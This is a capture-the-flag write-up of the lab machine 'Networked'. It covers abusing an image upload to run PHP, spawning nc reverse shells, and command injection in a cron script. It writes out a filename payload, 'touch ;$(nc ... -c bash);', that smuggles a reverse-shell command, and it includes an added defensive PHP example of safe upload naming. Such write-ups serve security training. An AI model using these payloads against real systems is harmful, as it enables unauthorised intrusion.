Networked just retired today. It was a pretty easy machine and I had the chance to practice my command injection skills. Its IP address is 10.10.10.146 and I added it to /etc/hosts as networked.htb to make accessing the machine easier. Without further ado, let’s jump right in!
Scanning & Web App Enumeration
A light nmap scan is all I needed to start attacking the box:
The index.html of the site was pretty basic:
There was also a hidden comment on the page:
I ran dirb on the page and found a directory named backup:
A file named backup.tar could be found in the directory:
I downloaded it and started looking through the source code:
Shell as www-data
Looking through the source, I didn’t find any major vulnerability that would allow me to change the uploaded file extension. However, the resulting file would keep all the extensions it has (e.g. a.php.jpg would be renamed [something].php.jpg). After re-reading the source code a few times, I tried to just append PHP code at the end of an image file and hope that the server will execute it if the filename contains .php:
I then uploaded the file by going to /upload.php:
After that, I browsed to /photos.php, right-clicked the image I just uploaded and clicked on ‘View Image’ so my browser would take me to the site’s uploads directory.
The server didn’t interpret the file as an image. In other words, the server found .php in the filename and interpreted it as a PHP script. I tried to supply a simple command via the cmd parameter and see if I had command execution:
The id command was successfully executed. Moreover, I could see the output at the end of the page. With that in mind, I used nc to spawn a reverse shell on port 443:
As soon as I got the reverse shell, I spawned a tty:
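An added example (not code from the box or from the original post) showing the naming flaw described above beside a hardened form: the hypothetical `legacy_name` models keeping every client-supplied extension, while `safe_name` discards the client name and assigns a single extension taken from the detected content type. It assumes PHP with the fileinfo extension enabled; the function names and the sample file are constructed for illustration.

```php
<?php
// Added example, not the application's code. All names here are hypothetical.

// Detected content type => the only extension the server will ever assign.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

// Models the behaviour described above: only the first name component is
// replaced, so every extension the client supplied survives in the result.
function legacy_name(string $clientName, string $prefix): string
{
    $parts = explode('.', $clientName);
    $parts[0] = $prefix;
    return implode('.', $parts);
}

// Hardened: ignore the client name entirely, derive one extension from the
// file's detected type, and pair it with a random base name.
function safe_name(string $tmpPath): ?string
{
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime === false || !isset(ALLOWED_TYPES[$mime])) {
        return null; // not an accepted image type: reject the upload
    }
    return bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
}

// Constructed sample input: a minimal GIF header written to a temp file.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "GIF89a\x01\x00\x01\x00\x00\x00\x00;");

// The legacy scheme keeps ".php" inside the stored name.
echo legacy_name('a.php.jpg', 'stored'), "\n";

// The hardened scheme never lets a client-chosen extension reach disk.
$name = safe_name($tmp);
echo ($name ?? 'rejected'), "\n";

unlink($tmp);
```

A file stored under a name like this is served as a static image even if PHP code was appended to it, because nothing in the name matches the PHP handler. Serving the uploads directory with script execution disabled closes the same gap at the server level.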
Shell as guly
After that, I started enumerating and searching for a way to get user. The first thing I did was to see if there is another user on the machine:
The user seemed to have a crontab file, so I checked its contents:
Basically, the following script would be run regularly:
There’s a simple command injection vulnerability in that script. I used touch ;$(nc 10.10.14.140 444 -c bash); to create a file that would get me a reverse shell whenever the script is executed. After waiting for about three minutes, I got the shell:
I will not post the contents of user.txt here, however, I will say that the proof starts with 52 🙂
Getting root
After getting the user proof, I started enumerating the host. While doing that, I found an interesting /etc/sudoers entry:
The current user can run /usr/local/sbin/changename.sh without providing a password. The script’s source is pretty simple:
To be honest, I discovered the method to get root through fuzzing and trying different payloads.